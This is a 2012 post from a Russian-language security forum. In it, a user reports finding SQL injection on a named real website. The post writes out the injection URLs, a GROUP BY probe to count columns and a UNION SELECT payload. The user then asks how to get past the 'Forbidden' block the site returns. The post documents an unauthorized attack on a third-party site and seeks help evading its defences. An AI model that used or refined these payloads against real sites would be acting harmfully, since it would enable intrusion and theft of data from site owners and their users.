HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 17.01.2012, 19:01
muljtik
Guest
Сообщений: n/a
Провел на форуме:
3622

Репутация: 0
По умолчанию
появилась проблема посерьёзнее предыдущий

в общем ситуация такая, есть пациент "avmaniacs.com", нашёл там sql inj, знаю точное кол-во стобцов, определил командой

www.avmaniacs.com/review.php?id=-319+group+by+27-- , если вместо 27 поставить число 28, то появится ошибка "Unknown column '28' in 'group statement'" следовательно стобцов 27

теперь вставляю такой запрос

www.avmaniacs.com/review.php?id=-319+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,27--

поидеи должна отобразится страница где покажутся несколько цифр, но мнесто этого вылазиет страница "Forbidden"

что можно мне сделать??
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ